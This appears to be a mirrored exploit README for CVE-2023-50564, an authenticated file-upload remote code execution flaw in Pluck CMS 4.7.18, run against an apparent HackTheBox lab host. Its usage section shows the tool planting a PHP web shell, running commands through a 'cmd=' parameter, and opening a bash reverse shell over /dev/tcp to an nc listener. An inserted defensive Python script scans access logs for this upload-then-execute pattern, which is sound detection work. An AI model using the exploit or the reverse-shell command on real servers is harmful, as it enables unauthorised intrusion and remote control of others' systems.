## https://sploitus.com/exploit?id=BC069992-9BB4-55E9-97F8-87B7C7881EBA
# CVE-2023-50564

CVE-2023-50564 is an RCE vulnerability in Pluck CMS v4.7.18. It is made possible by an arbitrary file upload vulnerability in the `/inc/modules_install.php` component, which allows arbitrary code to be executed by uploading a malicious `.zip` file.
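For defenders, the description above gives two log artifacts worth watching for: a POST to the module installer, followed by direct requests to a PHP file under `/data/modules/<module>/` carrying a `cmd=` parameter. The script below is an added example (not part of this PoC or of Pluck) that scans Apache/nginx combined-format access logs for that sequence. It assumes the combined log format, that the installer request path contains `modules_install.php`, and that `data/modules` is not meant to be requested directly by browsers; the sample log lines are constructed for the example.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" access-log format (assumed; adjust LOG_RE for other formats).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Paths taken from the advisory above: the vulnerable installer component and the
# location where an uploaded module's PHP file ends up.
INSTALLER_MARKER = "modules_install.php"
MODULE_PHP_RE = re.compile(
    r"^/data/modules/(?P<module>[^/]+)/[^/?]+\.php(?:\?(?P<query>.*))?$"
)

# Constructed sample log: one benign visitor, one attacker-like sequence, one stray hit.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jan/2024:12:00:01 +0000] "GET /login.php HTTP/1.1" 200 1532',
    '10.0.0.5 - - [10/Jan/2024:12:00:02 +0000] "POST /login.php HTTP/1.1" 302 0',
    '10.0.0.5 - - [10/Jan/2024:12:00:03 +0000] "POST /inc/modules_install.php HTTP/1.1" 200 2100',
    '10.0.0.5 - - [10/Jan/2024:12:00:04 +0000] "GET /data/modules/malicious/malicious.php?cmd=id HTTP/1.1" 200 58',
    '10.0.0.9 - - [10/Jan/2024:12:01:00 +0000] "GET /data/modules/foo/foo.php HTTP/1.1" 404 200',
    '10.0.0.9 - - [10/Jan/2024:12:01:01 +0000] "GET /index.php HTTP/1.1" 200 4000',
]


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_access_log(lines):
    """Return findings for the exploitation pattern described above: a POST to the
    module installer, then direct requests to a PHP file in /data/modules/<module>/,
    flagged as high-confidence when they carry a cmd= parameter."""
    findings = []
    installer_posts = defaultdict(int)  # client IP -> number of installer POSTs seen

    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparsable line; a real deployment would count or log these
        if rec["method"] == "POST" and INSTALLER_MARKER in rec["path"]:
            installer_posts[rec["ip"]] += 1
            findings.append({"kind": "module_install_post", "ip": rec["ip"],
                             "path": rec["path"], "ts": rec["ts"]})
            continue
        m = MODULE_PHP_RE.match(rec["path"])
        if m:
            # Assumption: data/modules is never requested directly by a normal client,
            # so any hit is suspicious; cmd= after an installer POST from the same IP
            # matches the web shell usage shown in this README.
            query = m.group("query") or ""
            kind = "webshell_command" if "cmd=" in query else "module_php_direct_request"
            findings.append({
                "kind": kind, "ip": rec["ip"], "module": m.group("module"),
                "path": rec["path"], "ts": rec["ts"],
                "preceded_by_install": installer_posts[rec["ip"]] > 0,
            })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f)
```

Run it against a real log with `scan_access_log(open("access.log"))`; the `preceded_by_install` flag separates a full upload-then-execute chain from an isolated probe of the modules directory, and a file-integrity check on `data/modules/` for PHP files that do not belong to an installed module is the natural complement on the host side.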

# Usage

Before running the exploit, the password to authenticate on `/login.php` needs to be known.

Running the exploit against the target:

```console
$ python3 exploit.py --target http://greenhorn.htb --password iloveyou1
[+] Creating payload malicious.zip
[+] Logging in
[+] Login successful
[+] Uploading malicious.zip
[+] Upload successful
[+] Access web shell at http://greenhorn.htb/data/modules/malicious/malicious.php?cmd=<COMMAND>
```

The malicious `.php` file can be accessed via the link printed by the script to execute commands.

Optionally, the command to execute can be specified with the `--cmd` flag.

```console
$ python3 exploit.py --target http://greenhorn.htb --password iloveyou1 --cmd id
[+] Creating payload malicious.zip
[+] Logging in
[+] Login successful
[+] Uploading malicious.zip
[+] Upload successful
[+] Access web shell at http://greenhorn.htb/data/modules/malicious/malicious.php?cmd=<COMMAND>
[+] Executing command 'id'

uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

## Reverse Shell

Start the listener, then use the `--cmd` flag to specify a command that establishes a reverse shell connection to the listener:

```console
$ python3 exploit.py --target http://greenhorn.htb --password iloveyou1 --cmd "bash -c 'bash -i >& /dev/tcp/10.10.16.25/7777 0>&1'"
[+] Creating payload malicious.zip
[+] Logging in
[+] Login successful
[+] Uploading malicious.zip
[+] Upload successful
[+] Access web shell at http://greenhorn.htb/data/modules/malicious/malicious.php?cmd=<COMMAND>
[+] Executing command 'bash -c 'bash -i >& /dev/tcp/10.10.16.25/7777 0>&1''
```

The listener then receives the connection:

```console
$ rlwrap -cAr nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.16.25] from (UNKNOWN) [10.129.78.209] 38982
bash: cannot set terminal process group (1003): Inappropriate ioctl for device
bash: no job control in this shell
www-data@greenhorn:~/html/pluck/data/modules/malicious$
```

# Installation

Install the requirements:

```console
$ pip install -r requirements.txt
```

Help:

```console
$ python3 exploit.py --help
usage: exploit.py [-h] --target TARGET --password PASSWORD [--cmd CMD]

Exploit Pluck v4.7.18 RCE Vulnerability

options:
  -h, --help           show this help message and exit
  --target TARGET      Target URL (Example: http://greenhorn.htb)
  --password PASSWORD  Pluck password
  --cmd CMD            Command to execute
```

# Credits

Credits to `Mirabbas Ağalarov` for discovering the vulnerability ([Link](https://www.exploit-db.com/exploits/51592)).